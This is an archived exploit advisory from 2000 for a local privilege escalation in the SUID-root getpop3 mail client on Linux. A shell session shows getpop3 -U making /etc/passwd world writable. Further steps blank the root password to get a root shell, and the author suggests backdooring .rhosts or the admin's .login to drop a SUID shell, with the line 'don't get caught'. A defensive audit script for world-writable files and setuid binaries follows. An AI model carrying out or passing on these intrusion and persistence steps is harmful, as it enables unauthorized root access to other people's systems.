
getpop3.txt

Posted Mar 2, 2000
Authored by r3p3nt | Site dhc1.cjb.net

Getpop3 POP client for linux local root exploit - make any local file world writable.

tags | exploit, local, root
systems | linux
SHA-256 | 7719521455848e7d654262495d9a48609860cc59ad1edd33a49d56c3bb2d61d2

########################################
#what?: [=-getpop3 exploit-=] #
#who?: [- by r3p3nt of the DHC -] #
#where?: [- http://dhc1.cjb.net -] #
#contact?: [- tdefiance@hotmail.com #
########################################
greets: all of DHC, duke, f0rpaxe, artech, and eli (up for some raceball?)
thanks: jwb

tdefiance@hotmail.com

You are wondering "hmm..what is getpop3, mister r3p3nt". Well, getpop3 is a
POP mail client for linux (no, not that stuff in Chex mix). This exploit has
been known by me for a very long time..so I might as well release it now.
This exploit was found when someone (he will go unnamed because I don't want
Joel to look like a fool) said his linux box was 'secure, no one can hack
it'. After some fumbling around on his box...root access was obtained.
The hole? Getpop3. Getpop3 is installed SUID root. If you don't know what SUID
root is..don't use this exploit@!$ When getpop3 is fed the -U parameter it sets
a file world writable. If you are a goon..here is how this could be good:

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08 Copyright 1997 Double Precision, Inc.

lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready Fri, 1
>USER elf
+OK Password required for elf
>PASS password
+OK elf's mailbox has 0 messages (0 octets)
>STAT
+OK 0 0
>QUIT
+OK poopy.reallame666.com POP3 server closing connection

*************************************************************
Whoo hooo! Now /etc/passwd is world writable..the fun begins*
Remember the file we backed up? *
*************************************************************

lamebox:~$ cat /tmp/backup > /etc/passwd

***********************************************************************
now edit the passwd file so you are 0:0 ...like so: *
root:x:0:0:super admin,,,:/root:/bin/bash <-- what's in the /etc/passwd*
root::0:0:your daddy,,,:/root/:bin/bash <-- what you change it to *
Now log on as root!@# *
If you didn't fuck anything up you should be dropped to a root shell, *
and not asked for a password. *
Don't wanna overwrite /etc/passwd? Then use .rhosts. Hell, you could *
even edit the admin's .login ...and make it so when the admin logs in he/she *
tosses an SUID root shell in /tmp *
Be creative in what you do, and don't get caught! *
***********************************************************************

*************FIX*********************************************
* I haven't noticed the hole in the newer versions. Upgrade. *
*************************************************************
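
The two conditions this advisory depends on (getpop3 installed SUID root, and a system file left world writable) can both be audited for. The script below is an added example, not part of the original advisory; the directory list, the file list and the `--audit` switch are assumptions to adjust per system.

```shell
#!/bin/sh
# Added audit example; not part of the original advisory.

# Setuid regular files under directory $1 owned by uid $2 (default 0 = root).
find_setuid() {
    find "$1" -xdev -type f -user "${2:-0}" -perm -4000 2>/dev/null
}

# Print each argument that exists and has the "other" write bit set.
world_writable() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        # -L: test the symlink target; -prune: do not descend into directories
        find -L "$f" -prune -perm -0002 -print 2>/dev/null
    done
}

# Host audit. The directory and file lists are assumptions; adjust per system.
audit_host() {
    status=0
    hits=$(world_writable /etc/passwd /etc/shadow /etc/group /etc/sudoers \
                          /root/.rhosts /root/.login)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits" | sed 's/^/WORLD-WRITABLE: /'
        status=1
    fi
    for dir in /bin /sbin /usr/bin /usr/sbin /usr/local/bin; do
        [ -d "$dir" ] || continue
        find_setuid "$dir" | while read -r bin; do
            case $bin in
                */getpop3) printf 'SETUID-ROOT (advisory target): %s\n' "$bin" ;;
                *)         printf 'setuid-root, review: %s\n' "$bin" ;;
            esac
        done
    done
    return "$status"
}

# Run the audit only when asked, so the functions can be sourced and tested.
if [ "${1:-}" = "--audit" ]; then
    audit_host
fi
```

Invoked with `--audit` it scans the host; a non-zero exit status means one of the listed files is world writable.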